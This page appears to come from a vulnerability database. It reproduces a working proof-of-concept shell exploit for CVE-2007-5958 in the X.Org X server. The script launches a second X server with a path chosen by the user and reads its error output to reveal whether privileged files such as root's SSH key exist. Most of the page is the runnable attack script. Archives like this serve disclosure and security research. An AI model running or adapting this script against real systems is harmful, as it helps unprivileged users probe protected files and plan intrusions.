Lucene search

K
seebugRootSSV:65214
HistoryJul 01, 2014 - 12:00 a.m.

X.Org xorg-server <= 1.1.1-48.13 - Probe for Files Exploit PoC

2014-07-0100:00:00
Root
www.seebug.org
13

0.0005 Low

EPSS

Percentile

14.4%

No description provided by source.


                                                #!/bin/sh
# Xorg file disclosure vulnerability (CVE-2007-5958)
#
# Lame xploit by vl4dZ :))
#
# sh-3.1$ whoami
# uid=1001(kecos) gid=1001(user) groups=1001(user)
# sh-3.1$ ./Xorg-File-Existence-PoC.sh /root/.ssh/id_dsa
# ...
# *** FILE /root/.ssh/id_dsa EXIST !! ***

# Vulnerable: xorg-server &#60;= 1.1.1-48.13

X_EXEC=/usr/bin/X
TMP_FILE=/tmp/X.$$

if [ &#34;$1&#34; = &#34;&#34; ]; then
   echo &#34;usage: $0 &#60;file&#62;&#34;
   exit 1
fi

[ -f ${X_EXEC} ] || (echo &#34;${X_EXEC} not found&#34;; exit 1)

echo -e &#34;\n** Xorg file disclosure vulnerability PoC (CVE-2007-5958) **\n&#34;
echo &#34;A second X server is going to be started, once started, type the &#34;
echo &#34;ctrl+Alt+Backspace sequence and you&#39;ll see the result of your request.&#34;
echo -en &#34;\nType [Enter] to start: &#34;; read

LANG=c ${X_EXEC} :1 -ac -sp $1 2&#62; ${TMP_FILE}

grep &#34;error opening security policy file&#34; ${TMP_FILE} &#62;/dev/null
if [ $? != 0 ]; then
   echo &#34;*** FILE $1 EXIST !! ***&#34;
else
   echo &#34;*** FILE $1 DOES NOT EXIST !! ***&#34;
fi
rm -f ${TMP_FILE}

echo -e &#34;\nCtrl-C to quit.&#34;
sleep 500

# milw0rm.com [2008-02-19]